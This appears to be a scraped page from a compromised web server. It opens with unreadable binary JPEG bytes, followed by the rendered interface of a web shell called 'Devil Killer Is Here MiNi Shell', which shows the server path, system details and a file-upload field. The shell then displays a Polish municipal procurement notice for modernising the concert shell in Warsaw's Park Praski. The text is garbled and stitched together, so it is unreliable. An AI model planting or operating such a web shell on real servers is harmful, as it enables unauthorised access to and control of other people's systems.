JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240520/0033055401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wykonanie robót budowlanych związanych z kompleksową modernizacją muszli koncertowej w Parku Praskim wraz z zagospodarowaniem terenu w Warszawie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa Dzielnica Praga-Północ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kłopotowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-708</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 443-80-(50 lub 48)</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ppn.zampubl@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.praga-pn.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wykonanie robót budowlanych związanych z kompleksową modernizacją muszli koncertowej w Parku Praskim wraz z zagospodarowaniem terenu w Warszawie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-14de9151-1287-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00330554</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00578864/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Wykonanie modernizacji muszli koncertowej w Parku Praskim w Warszawie, w formule &#39;zaprojektuj i wybuduj&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w niniejszym<br/>postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>zakupowej pod adresem https://zamowienia.um.warszawa.pl zwanej dalej Platformą lub Systemem. Wymagania techniczne i<br/>organizacyjne określono w pkt 27 SWZ.<br/>Uwaga:<br/>Rejestracja Wykonawcy na Platformie<br/>następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. W<br/>uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) weryfikacja danych Wykonawcy może<br/>trwać maksymalnie do 2 dni roboczych. Mając to na uwadze, Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego<br/>na rejestrację w procesie złożenia Oferty w formie elektronicznej lub w postaci elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje znajdują się w pkt. 8 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje znajdują się w pkt. 8 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Znak sprawy: UD-VII-WZP.271.11.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Zaprojektowanie i wykonanie robót budowlanych związanych z kompleksową modernizacją muszli koncertowej w Parku Praskim wraz z zagospodarowaniem terenu w Warszawie.<br/>Lokalizacja Inwestycji: Muszla Koncertowa położona na terenie Parku Praskiego w Warszawie, w Dzielnicy Praga – Północ, działka ew. nr 8 obręb 4-15-02.<br/>W ramach przedmiotowego zamówienia Zamawiający uprawniony jest do skorzystania z prawa opcji na zasadach opisanych w niniejszej specyfikacji, w Opisie Przedmiotu Zamówienia (zwanym dalej: OPZ) wraz z załącznikami, stanowiącym załącznik nr 7 do SWZ oraz w projektowanych postanowieniach umowy wraz z załącznikami, stanowiących załącznik nr 2 do SWZ.<br/>Zakres rzeczowy przedmiotu zamówienia obejmuje roboty budowlane, poprzedzone opracowaniem dokumentacji projektowej.<br/>Opis prac został umieszczony w Programie Funkcjonalno-Użytkowym (dalej PFU), który stanowi załącznik nr 2 do OPZ stanowiącego załącznik nr 7 do SWZ. <br/>Zamówienie podzielone jest na trzy etapy:<br/><br/>ETAP I:<br/><br/>wykonanie dokumentacji projektowej w oparciu o dołączone do SWZ dokumenty w tym OPZ z załącznikami oraz projektowane postanowienia umowy z załącznikami. <br/>W zakres Etapu I wchodzi wykonanie m. in.:<br/>a)	projektu zagospodarowania terenu; <br/>b)	projektu architektoniczno-budowlanego wraz z uzyskaniem wymaganych opinii, uzgodnień i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów, uzyskanie niezbędnych odstępstw od obowiązujących przepisów (o ile okaże się to konieczne) oraz uzyskanie w imieniu Zamawiającego pozwolenia na budowę, w tym uzyskanie pozwolenia Mazowieckiego Wojewódzkiego Konserwatora Zabytków (MWKZ) na wykonanie robót budowlanych; <br/>c)	projektu technicznego w szczegółowości projektu wykonawczego w formie odrębnych opracowań branżowych (wzajemnie ze sobą skoordynowane wszystkie branże występujące w przedmiocie zamówienia). Projekty techniczne powinny uzupełniać i uszczegóławiać projekt architektoniczno-budowlany w zakresie i stopniu dokładności niezbędnym do realizacji robót budowlanych;<br/>d)	informacji BIOZ do projektu technicznego – informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę obiektu budowlanego;<br/>e)	innych opracowań nie wymienionych wyżej a wymaganych przez jednostki uzgadniające;<br/>f)	specyfikacji technicznych wykonania i odbioru robót budowlanych (STWiOR);<br/>g)	przedmiarów robót;<br/>h)	kosztorysów inwestorskich, wykonane w układzie branżowym, jako oddzielne opracowania dla poszczególnych rodzajów robót. <br/>Uwaga:<br/>Wykonanie dokumentacji projektowej (ETAP I) obejmuje zakres:<br/>•	robót Podstawowych (ETAP II) oraz<br/>•	prawa Opcji (ETAP III)<br/><br/><br/>ETAP II: <br/>wykonanie robót budowlanych – stanowiących zamówienie podstawowe (zakres opisano w OPZ i załącznikach).<br/>W zakres Etapu II wchodzi wykonanie m. in.:<br/>a)	wszystkich robót związanych z kompleksową modernizacją muszli koncertowej;<br/>b)	opracowania charakterystyki energetycznej budynku dla budynku muszli koncertowej po wykonaniu robót budowlanych;<br/>c)	opracowania dokumentacji powykonawczej.<br/>d)	pełnienia nadzoru autorskiego w trakcie realizacji robót budowlanych, zwanym dalej nadzór autorski.<br/><br/><br/>ETAP III: <br/>wykonanie robót budowlanych – stanowiących prawo Opcji - zagospodarowanie terenu <br/>Przedmiot zamówienia objęty prawem opcji obejmuje wykonanie robót budowlanych na podstawie zatwierdzonej dokumentacji projektowej w zakresie zagospodarowania terenu: <br/>a)	wykonanie nasypu; <br/>b)	wykonanie widowni z prefabrykowanego betonu architektonicznego; <br/>c)	wykonanie nawierzchni wokół muszli koncertowej;<br/>d)	wykonanie oświetlenia terenu zewnętrznego; <br/>e)	wykonanie nasadzeń;<br/>f)	wykonanie dokumentacji powykonawczej;<br/>g)	pełnienie nadzoru autorskiego w trakcie realizacji robót. <br/>Szczegółowy zakres skorzystania z prawa opcji opisany jest w OPZ z załącznikami, w tym w PFU (załącznik nr 7 do SWZ) i projektowanych postanowieniach umowy (załącznik nr 2 do SWZ).<br/>Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej:<br/>1)	Zamawiający ma prawo do skorzystania z prawa opcji w całości; <br/>2)	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też za nieskorzystanie przez Zamawiającego z prawa opcji, nie przysługuje Wykonawcy wynagrodzenie oraz nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego;<br/>3)	Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego oświadczenia woli od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego jego zakres w ramach przedmiotowego uprawnienia Zamawiającego. Strony dopuszczają możliwość złożenia tego oświadczenia za pośrednictwem poczty elektronicznej na adres wskazany w § 19 ust. 4 pkt 2 projektowanych postanowień umowy; <br/>4)	Termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż termin wykonania przedmiotu Umowy w zakresie podstawowym, określony w § 2 ust. 1 pkt 2 projektowanych postanowień umowy;<br/>5)	Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego, z zastrzeżeniem przypadków w projektowanych postanowieniach umowy, w których odrębnie uregulowano zapisy dotyczące prawa opcji (termin, wynagrodzenie, zabezpieczenie należytego wykonania umowy, kary umowne); <br/>6)	Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie do ośmiu miesięcy, licząc od dnia zawarcia umowy.<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru robót określają:<br/>a)	OPZ wraz z załącznikami (w tym PFU i zalecenia konserwatorskie) – Załącznik nr 7 do SWZ<br/>b)	Projektowane postanowienia umowy z załącznikami – załącznik nr 2 do SWZ<br/>Zamawiający udostępnia Przedmiar kalkulacji kosztów inwestycji (załącznik nr 8 SWZ), stanowiący materiał informacyjny (pomocniczy) o zakresie przedmiotu zamówienia (nie wymagany do złożenia wraz z ofertą). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W ramach przedmiotowego zamówienia Zamawiający uprawniony jest do skorzystania z prawa opcji na zasadach opisanych<br/>w pkt. 9 SWZ , w Opisie Przedmiotu Zamówienia wraz z załącznikami, w tym PFU (załącznik nr 7 do SWZ) oraz w<br/>projektowanych postanowieniach umowy wraz z załącznikami (załącznik nr 2 do SWZ) . <br/><br/>Skorzystanie z prawa Opcji nie jest obowiązkowe dla Zamawiającego.<br/>W przypadku nie skorzystania przez Zamawiającego z prawa Opcji Wykonawcy nie przysługuje wynagrodzenie oraz<br/>jakiekolwiek inne roszczenie z tego tytułu.<br/>Przedmiot zamówienia objęty prawem opcji obejmuje wykonanie robót budowlanych na podstawie zatwierdzonej<br/>dokumentacji projektowej w zakresie zagospodarowania terenu:<br/>a) wykonanie nasypu;<br/>b) wykonanie widowni z prefabrykowanego betonu architektonicznego;<br/>c) wykonanie nawierzchni wokół muszli koncertowej;<br/>d) wykonanie oświetlenia terenu zewnętrznego;<br/>e) wykonanie nasadzeń;<br/>f) wykonanie dokumentacji powykonawczej;<br/>g) pełnienie nadzoru autorskiego w trakcie realizacji robót.<br/>Szczegółowy zakres skorzystania z prawa opcji opisany jest w OPZ z załącznikami i projektowanych postanowieniach umowy z załącznikami.<br/>Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej:<br/>1) Zamawiający ma prawo do skorzystania z prawa opcji w całości;<br/>2) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie<br/>przez Zamawiającego z prawa opcji nie przysługuje Wykonawcy wynagrodzenie oraz nie stanowi podstawy dla Wykonawcy<br/>do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego;<br/>3) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego<br/>oświadczenia woli od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego jego zakres w ramach<br/>przedmiotowego uprawnienia Zamawiającego. Strony dopuszczają możliwość złożenia tego oświadczenia za<br/>pośrednictwem poczty elektronicznej na adres wskazany w § 19 ust. 4 pkt 2 projektowanych postanowień umowy;<br/>4) Termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż termin wykonania przedmiotu Umowy w<br/>zakresie podstawowym, określony w § 2 ust. 1 pkt 2 projektowanych postanowień umowy;<br/>5) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji<br/>zamówienia podstawowego, z zastrzeżeniem przypadków w projektowanych postanowieniach umowy, w których odrębnie<br/>uregulowano zapisy dotyczące prawa opcji (termin, wynagrodzenie, zabezpieczenie należytego wykonania umowy, kary<br/>umowne);<br/>6) Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie do ośmiu miesięcy, licząc od dnia zawarcia umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek udziału w postępowaniu dotyczący zdolności technicznej<br/>lub zawodowej Wykonawcy. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>1) w zakresie doświadczenia, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonał (zakończył)* w sposób należyty co najmniej jedną robotę budowlaną<br/>polegającą na budowie, przebudowie lub remoncie budynku użyteczności publicznej** z wykonaniem robót budowalnych<br/>wielobranżowych (w co najmniej następujących branżach: ogólnobudowlanej, sanitarnej i elektrycznej) o wartości nie<br/>mniejszej niż 1 500 000,00 zł brutto.<br/>UWAGA:<br/>*Za wykonaną robotę Zamawiający uzna taką robotę, której przedmiot został odebrany przez Zamawiającego jako<br/>wykonany w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.<br/>**Budynek użyteczności publicznej – zgodnie z Rozporządzaniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w<br/>sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie, przez budynek użyteczności<br/>publicznej należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury,<br/>kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi<br/>bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi<br/>pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek<br/>przeznaczony do wykonywania podobnych funkcji. Za budynek użyteczności publicznej uznaje się także budynek biurowy<br/>lub socjalny.<br/>2) w zakresie osób skierowanych do realizacji zamówienia<br/>dysponuje:<br/>1. co najmniej jedną osobą, która będzie pełniła funkcję głównego projektanta, posiadającą uprawnienia budowlane do<br/>projektowania bez ograniczeń w specjalności architektonicznej;<br/>2. co najmniej jedną osobą, która będzie pełniła funkcję projektanta, posiadającą uprawnienia budowlane do projektowania<br/>bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>3. co najmniej jedną osobą, która będzie pełniła funkcję projektanta, posiadającą uprawnienia budowlane do projektowania<br/>bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, instalacji i urządzeń gazowych,<br/>wentylacyjnych, wodociągowych i kanalizacyjnych;<br/>4. co najmniej jedną osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia budowlane do<br/>kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej;<br/>5. co najmniej jedną osobą, która będzie pełniła funkcję kierownika robót, posiadającą uprawnienia budowlane do<br/>kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych;<br/>6. co najmniej jedną osobą, która będzie pełniła funkcję kierownika robót, posiadającą uprawnienia budowlane do<br/>kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>cieplnych, instalacji i urządzeń gazowych, wentylacyjnych, wodociągowych i kanalizacyjnych.<br/>Uwaga:<br/>Uprawnienia budowlane winny być wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2023<br/>poz. 682 ze zm.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (t.j. Dz. U. 2019 poz. 831) lub<br/>odpowiadające im inne ważne uprawnienia budowlane, w zakresie adekwatnym do przedmiotu zamówienia, wydane na<br/>mocy wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12 a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1<br/>ustawy Prawo budowlane mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na<br/>zasadach określonych w przepisach odrębnych, tj. przepisach ustawy z 